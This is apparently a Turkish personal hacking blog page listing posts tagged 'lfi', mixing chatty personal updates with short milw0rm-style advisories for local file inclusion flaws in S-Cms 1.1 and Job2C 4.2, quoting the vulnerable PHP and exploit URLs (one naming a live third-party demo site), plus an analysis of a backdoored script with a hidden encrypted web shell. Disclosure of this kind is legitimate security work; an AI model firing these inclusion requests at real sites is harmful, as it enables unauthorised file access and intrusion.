lfi etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
lfi etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
26 Temmuz 2011 Salı
özlemişim :))
ocak 17-temmuz 26 baya bi zaman geçmiş :)) pr aşağı düşmüş aşağılık kopmleksi yaşıyormuş :P doktor muhtemelen asker ;) life kardeşimle görüşemedim bile :(( bla aylardır bloğuna uğramamış ben gibi :(( vs vs vs ben neler yaptım küçük bi site tasarladım public yaparım çok eksiği var :) ama tema vs beni sardı. buffer overflow a baya bi yoğunlaştım ara ara kafayı mı yiyorum diye tereddütler yaşayınca aralar verdim :) verdiğim aralarda da siteyi tasarladım :) php baya bi ilerlettim yani uzmanlık seviyesinde değil ama benim işimi görüyor. bol bol lfi ile uğrastım :DD keza python yine baş tacı :)) 20 bilemedin 25 gün kadar da kpss hazırlandım çok bile :)) bu kadar başka değişiklik yok.
30 Nisan 2009 Perşembe
S-Cms 1.1 Stable (page) Local File Inclusion Vulnerability
kaynak: http://www.milw0rm.com/exploits/8566
kaynak: http://www.yildirimordulari.com/showthread.php?t=6244
kaynak: http://www.yildirimordulari.com/showthread.php?t=6244
file:
s-cms/plugin.php
code:
$page=$_GET['page']; ( error 1 )
$sql_select_plugin_case= mysql_query("SELECT * FROM ".$prefix."_plugins WHERE active = '1' AND file='$page'");
if ($sql_select_plugin_case){
include "plugins/$page"; (error 2 )
exp:
yildirimordulari.com/s-cms/plugin.php?page=[File]
for demo:
http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi]
24 Nisan 2009 Cuma
işte bir zone scripti daha
şimdi scripti beraber inceleyelim. scriptte ilk basta hersey normalmiş gibi görüniyo fakat biraz tarattığımızda rfi ve sql açıkları ile birde shell mevcut :) shell direk gözükmüyor hatta işini bilen kişiler tarafından hazırlandığıda belli oluyo tebrik etmekte lazım şimdi bakalım:
rfi:


sekilde de gördüğünüz gibi sadece bir rfi var oda system/sayfa.php de include edile dizin verisidir. oysa dizin verisi tanımlansa bu açık ortadan kalkacak bilerek tanımlanmamış ;) yada hiç buna bile gerek kalmadan ../alt.php şeklinde include edilse yine böyle bir sorun olmuycak yani sırf açık mevcut olsun script kullanıldıktan birkac gün sonra çakalım :D
gelelim başka bir açığa ama bu benimde hoşuma gitti beğendim. önce shell i css/spread klasörünün içine yerleştirmişler tabi bunu şifrelemişler yani bakınca direk shell olduğunu görmeniz mümkün değil hani sistem dosyasıymış gibi algılamanızı sağlıycak. benim hoşuma giden teknik ise kendi hazırladıkları index.html dosyasında bu dosyayı göstermemeleri. yani siz girdiğinizde bütün dosyaları görceksiniz yani adamlar herseyi tasarlamıslar. alın size sosyal :D ama ciddi manada ben beğendim tekniği ;) neyse bi kaç görüntü verdim inceleyin umarım demek istediğimi anlamıssınızdır. scriptleri lütfen körü körüne alıp site açmayın inceleyin ;)



rfi:


sekilde de gördüğünüz gibi sadece bir rfi var oda system/sayfa.php de include edile dizin verisidir. oysa dizin verisi tanımlansa bu açık ortadan kalkacak bilerek tanımlanmamış ;) yada hiç buna bile gerek kalmadan ../alt.php şeklinde include edilse yine böyle bir sorun olmuycak yani sırf açık mevcut olsun script kullanıldıktan birkac gün sonra çakalım :D
gelelim başka bir açığa ama bu benimde hoşuma gitti beğendim. önce shell i css/spread klasörünün içine yerleştirmişler tabi bunu şifrelemişler yani bakınca direk shell olduğunu görmeniz mümkün değil hani sistem dosyasıymış gibi algılamanızı sağlıycak. benim hoşuma giden teknik ise kendi hazırladıkları index.html dosyasında bu dosyayı göstermemeleri. yani siz girdiğinizde bütün dosyaları görceksiniz yani adamlar herseyi tasarlamıslar. alın size sosyal :D ama ciddi manada ben beğendim tekniği ;) neyse bi kaç görüntü verdim inceleyin umarım demek istediğimi anlamıssınızdır. scriptleri lütfen körü körüne alıp site açmayın inceleyin ;)




Etiketler:
lfi,
localhost,
resimli script,
rfi,
script inceleme,
zone script download
15 Nisan 2009 Çarşamba
Job2C 4.2 (adtype) Multiple Local File Inclusion Vulnerabilities
kaynak: http://www.milw0rm.com/exploits/8443
kaynak: http://www.yildirimordulari.com/showthread.php?t=5228
kaynak: http://www.yildirimordulari.com/showthread.php?t=5228
file:
windetail.php
err0r c0de:
$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"]; ( err0r c0de 1 )
$title=$_REQUEST["title"];
winHead($title);
include("lib/".$adtype.".inc"); ( err0r c0de 2 )
exp 1:
yildirimordulari.com/script/windetail.php?adtype=LFi
file:
detail.php
err0r c0de:
$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"]; ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";
include("lib/".$adtype.".inc"); ( err0r c0de 1 )
exp 2:
yildirimordulari.com/script/detail.php?adtype=LFi00
3 Mart 2009 Salı
str0ke ömrümü yedin xD
yav son günlerde gönderdiğim bütün buglara bir kulp takıyor namussuz :D yok nerden indircem yok versiyon a.q sen bul onlarında açık varmı var :D sözün kısası pek bi anlaşamıyoruz xD
Etiketler:
(cat) Remote Sql injection,
lfi,
milw0rm.com,
milw0rm.org,
rfi,
securityfocus,
sql injection,
str0ke
Kaydol:
Kayıtlar (Atom)